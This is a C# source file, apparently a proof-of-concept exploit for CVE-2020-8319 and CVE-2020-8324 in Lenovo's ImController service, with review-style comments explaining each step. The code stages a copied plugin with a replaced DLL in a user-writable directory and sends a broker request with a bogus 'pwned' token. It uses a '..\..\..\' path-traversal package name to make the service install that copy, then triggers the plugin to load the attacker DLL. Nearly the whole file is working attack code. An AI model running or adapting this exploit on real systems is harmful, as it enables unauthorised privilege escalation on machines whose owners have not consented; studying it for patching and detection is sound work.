CVE-2020-8319_CVE-2020-8324.cs
using Lenovo.Modern.ImController.ImClient.Models;
using Lenovo.Modern.ImController.ImClient.Services;
using Lenovo.Modern.ImController.ImClient.Services.Umdf;
using Lenovo.Modern.ImController.PluginManager.Services;
using Lenovo.Modern.ImController.Shared.Services;
using Lenovo.Modern.Utilities.Patterns.Ioc;
using Lenovo.Modern.Utilities.Services;
using Microsoft.Win32;
using System;
using System.IO;
using System.Threading;
using System.Threading.Tasks;
using System.Xml;
using System.Xml.Serialization;
namespace Playground {
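class LenovoExploit {
    // Proof-of-concept for CVE-2020-8319 / CVE-2020-8324 (per the file name) against the Lenovo
    // ImController service. Flow, as implemented below:
    //   1. copy an installed ImController plugin into a directory the current user controls and
    //      overwrite one of its DLLs with an attacker-supplied binary (PrepareFolders);
    //   2. ask the ImController broker to "Install-PendingUpdates" naming the package with a
    //      "..\..\..\" prefix, so the installer resolves it outside its own Plugins tree;
    //   3. send a plugin request ("Get-TouchScreenState") whose handler presumably loads the
    //      replaced DLL.
    //
    // Points a reviewer / operator should keep in mind:
    //   * The payload is staged under C:\ProgramData\Lenovo. The PoC assumes that tree is
    //     writable by an unprivileged user — NOTE(review): confirm the ACL on the target; without
    //     that the copy step fails before anything is sent to the service.
    //   * The broker request carries the literal authentication token "pwned" and the PoC only
    //     continues if the service answers "Success", i.e. it expects the token not to be checked.
    //   * The DLL is presumably executed in the service's security context — that is the point of
    //     the PoC, but this file does not show the loader, so verify it on the target version.
    //   * There is no cleanup: the copied plugin tree and the replaced DLL stay on disk.
    //   * Run only on machines you are authorised to test.

    // Base64 of the replacement for TouchScreenContronlDLL.dll. Replace with your own (Uber)
    // exploit DLL. Exploit() refuses to run while this is empty, because an empty payload would
    // only truncate the copied DLL to zero bytes and the final plugin request would then fail.
    const string exploitDLL = "";

    // Source plugin (installed by ImController) and the user-controlled copy of it.
    // The request below names the package WITHOUT the trailing underscore; how the installer
    // maps that name onto the "_" directories used here is not visible in this file — confirm
    // against the ImController installer if the wait loop in Exploit() never sees the directory.
    const string originalPluginDir = @"C:\ProgramData\Lenovo\ImController\Plugins\LenovoAppScenarioPluginSystem";
    const string stagedPluginDir = @"C:\ProgramData\Lenovo\LenovoAppScenarioPluginSystem_";
    const string payloadDllPath = @"C:\ProgramData\Lenovo\LenovoAppScenarioPluginSystem_\x64\TouchScreenContronlDLL.dll";
    // Directory whose disappearance Exploit() treats as "install finished".
    const string installInProgressDir = @"C:\ProgramData\Lenovo\ImController\Plugins\LenovoAppScenarioPluginSystem_";
    // Upper bound for that wait (the original looped forever); the comment printed to the user
    // says "a few minutes", so ten is generous.
    const int maxInstallWaitSeconds = 600;

    // UMDF driver agent used to exchange XML requests/responses with the ImController broker.
    DeviceDriverAgent _deviceAgent;

    // XML-serialises `instance` with the default XmlSerializer/XmlWriter settings and returns
    // the document as a string. Used to turn a BrokerRequest into the broker's wire format.
    private string Serialize<T>(T instance) {
        string result = null;
        using (StringWriter stringWriter = new StringWriter()) {
            XmlSerializer xmlSerializer = new XmlSerializer(typeof(T));
            using (XmlWriter xmlWriter = XmlWriter.Create(stringWriter)) {
                xmlSerializer.Serialize(xmlWriter, instance);
            }
            result = stringWriter.ToString();
        }
        return result;
    }

    // Recursively copies `sourceFolder` into `destFolder`, creating `destFolder` if needed and
    // overwriting files that already exist there. Throws (DirectoryNotFound/UnauthorizedAccess)
    // if the source is missing or the destination is not writable.
    private void CopyFolder(string sourceFolder, string destFolder) {
        if (!Directory.Exists(destFolder)) {
            Directory.CreateDirectory(destFolder);
        }
        foreach (string file in Directory.GetFiles(sourceFolder)) {
            string dest = Path.Combine(destFolder, Path.GetFileName(file));
            File.Copy(file, dest, true);
        }
        foreach (string folder in Directory.GetDirectories(sourceFolder)) {
            string dest = Path.Combine(destFolder, Path.GetFileName(folder));
            CopyFolder(folder, dest);
        }
    }

    // Stages the malicious package: copies the original plugin to the user-controlled directory
    // and overwrites its x64 TouchScreenContronlDLL.dll with the decoded exploitDLL bytes.
    // Throws FileNotFoundException if the copied plugin does not contain that DLL (the original
    // FileMode.Truncate open would throw the same type, just with a less useful message).
    private void PrepareFolders() {
        CopyFolder(originalPluginDir, stagedPluginDir);
        byte[] data = Convert.FromBase64String(exploitDLL);
        if (!File.Exists(payloadDllPath)) {
            throw new FileNotFoundException("Copied plugin does not contain the DLL to replace", payloadDllPath);
        }
        // Truncate rather than Create: keep the file's existing ACL/attributes, only swap contents.
        using (FileStream stream = File.Open(payloadDllPath, FileMode.Truncate, FileAccess.ReadWrite)) {
            stream.Write(data, 0, data.Length);
        }
    }

    // Waits for the broker's response to `taskId` and deserialises it.
    // `responseReceivedHandler` is accepted for signature compatibility but never invoked.
    // Throws ArgumentException for an empty task id and BrokerRequestAgentException (408) when
    // the agent returns no response / no XML, or (409) when the XML does not deserialise to a
    // response that carries a Task.
    private async Task<BrokerResponse> GetResponseAsync(Guid taskId, Func<BrokerResponseTask, bool> responseReceivedHandler, CancellationToken cancelToken) {
        if (taskId == Guid.Empty) {
            throw new ArgumentException(string.Format("Invalid task ID provided: {0}", taskId));
        }
        Tuple<Guid, string> tuple = await _deviceAgent.WaitForResponseAsync(taskId, cancelToken);
        if (tuple == null && cancelToken.IsCancellationRequested) {
            throw new BrokerRequestAgentException(string.Format("CancelToken is canceled while waiting for response for task {0}: response pair is null", taskId)) {
                ResponseCode = 408
            };
        }
        if (tuple == null) {
            throw new BrokerRequestAgentException(string.Format("Invalid/Empty Broker Response provided for task {0}: response pair is null", taskId)) {
                ResponseCode = 408
            };
        }
        if (string.IsNullOrWhiteSpace(tuple.Item2)) {
            throw new BrokerRequestAgentException(string.Format("Invalid/Empty Broker Response XML provided for task {0}", taskId)) {
                ResponseCode = 408
            };
        }
        BrokerResponse brokerResponse = null;
        try {
            brokerResponse = Serializer.Deserialize<BrokerResponse>(tuple.Item2);
        } catch (Exception ex) {
            // Deliberately not rethrown: the null check below turns this into a 409. Only the
            // length of the XML is logged so that a large/odd response does not flood the console.
            Console.WriteLine("GetResponseAsync exception on response deserialization (" + ex.Message + "). responsePair.Item2 length = " + tuple.Item2.Length);
        }
        if (brokerResponse == null || brokerResponse.Task == null) {
            throw new BrokerRequestAgentException("Invalid broker response data") {
                ResponseCode = 409
            };
        }
        return brokerResponse;
    }

    // Returns the broker's response for `taskId` and closes the task on the agent.
    // NOTE(review): the original version of this method had a "keep waiting" loop whose
    // continue-flag was never set, so it always returned after the FIRST response regardless
    // of Task.IsComplete. That behaviour is kept on purpose (changing it risks a hang); if the
    // broker streams intermediate responses for a task, the caller gets the first one, not the
    // final one. The task is not closed when GetResponseAsync throws.
    private async Task<BrokerResponse> GetFinalContractResponseAsync(Guid taskId, Func<BrokerResponseTask, bool> responseReceivedHandler, CancellationToken cancelToken) {
        BrokerResponse brokerResponse = await GetResponseAsync(taskId, responseReceivedHandler, cancelToken);
        await _deviceAgent.CloseTaskAsync(taskId);
        return brokerResponse;
    }

    // Serialises `brokerRequest` to XML, submits it through the driver agent and returns the
    // (first) response. No cancellation is wired up: CancellationToken.None is used.
    private async Task<BrokerResponse> sendBrokerRequest(BrokerRequest brokerRequest) {
        string command = Serialize<BrokerRequest>(brokerRequest);
        Guid guid = await _deviceAgent.PutRequestAsync(command);
        // The handler is never called by GetResponseAsync; it only satisfies the signature.
        return await GetFinalContractResponseAsync(guid, (func) => {
            return true;
        }, CancellationToken.None);
    }

    // Runs the whole chain described in the class comment. Returns a Task (not async void) so
    // the caller can await it and observe exceptions from the file system or the broker.
    // Prints "[!]" diagnostics and returns early when the payload is not configured, when no
    // driver agent instance is available, or when the install request is not answered with
    // "Success". The result of the final plugin request is not checked.
    public async Task Exploit() {
        if (string.IsNullOrWhiteSpace(exploitDLL)) {
            Console.WriteLine("[!] exploitDLL is empty; set it to the base64 of your payload DLL before running");
            return;
        }
        Console.WriteLine("[+] Preparing exploitable plugin package");
        PrepareFolders();

        Console.WriteLine("[+] Setting up requred BrokerResponseAgent");
        InstanceContainer instance = InstanceContainer.GetInstance();
        instance.RegisterInstance<IBrokerResponseAgent>(BrokerResponseAgent.GetInstance());
        instance.RegisterInstance<IPluginManager>(PluginManager.GetInstance());

        Console.WriteLine("[+] Setting up UDMF driver agent");
        _deviceAgent = DeviceDriverAgent.GetInstance();
        if (_deviceAgent == null) {
            Console.WriteLine("[!] Failed to get instance of UDMF driver agent, is this a Lenovo machine with ImController installed?");
            return;
        }

        // Request envelope. The token is a bogus literal; a service that validated it would
        // reject the request and the "Success" check below would stop the PoC.
        BrokerRequest breq = new BrokerRequest();
        breq.Version = "1";
        breq.Authentication = new BrokerAuthentication();
        breq.Authentication.Token = "pwned";
        breq.BrokerRequirements = new BrokerRequirements();
        breq.BrokerRequirements.MinVersion = "1";

        // Package name with a "..\..\..\" prefix: the installer joins it onto its own base
        // directory, so this walks three levels up and makes the service install the staged,
        // attacker-controlled copy instead of a package from its Plugins tree.
        string contractRequestParameter = @"
<InstallPendingRequest>
<PackageList>
<Package name=""..\..\..\LenovoAppScenarioPluginSystem""/>
</PackageList>
</InstallPendingRequest>";
        breq.ContractRequest = new ContractRequest {
            Command = new ContractCommandRequest {
                Name = "Install-PendingUpdates",
                Parameter = contractRequestParameter,
                RequestType = "sync"
            },
            Name = "ImController"
        };

        Console.WriteLine("[+] Sending Install-PendingUpdates BrokerRequest");
        BrokerResponse br = await sendBrokerRequest(breq);
        if (br.Result != "Success") {
            Console.WriteLine("[!] Request for Install-PendingUpdates failed");
            return;
        }

        // The install is asynchronous on the service side: wait for the in-progress directory
        // to go away, but give up after maxInstallWaitSeconds instead of spinning forever.
        Console.WriteLine("[-] Waiting for plugin to install, this can take a few minutes");
        await Task.Delay(5000);
        int waitedSeconds = 0;
        while (Directory.Exists(installInProgressDir)) {
            if (waitedSeconds >= maxInstallWaitSeconds) {
                Console.WriteLine("[!] Plugin install did not finish within " + maxInstallWaitSeconds + " seconds, giving up");
                return;
            }
            await Task.Delay(1000);
            waitedSeconds++;
        }
        await Task.Delay(1000);
        Console.WriteLine("[+] Package delivered!");

        // Same envelope (including the bogus token), now addressed to the installed plugin.
        // Its handler for Get-TouchScreenState is expected to load the replaced DLL.
        Console.WriteLine("[+] Making plugin request to trigger exploit");
        breq.ContractRequest = new ContractRequest {
            Command = new ContractCommandRequest {
                Name = "Get-TouchScreenState",
                Parameter = null,
                RequestType = "sync"
            },
            Name = "SystemManagement.AppScenario.System"
        };
        br = await sendBrokerRequest(breq);
        Console.WriteLine("[+] Enjoy");
    }
}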
}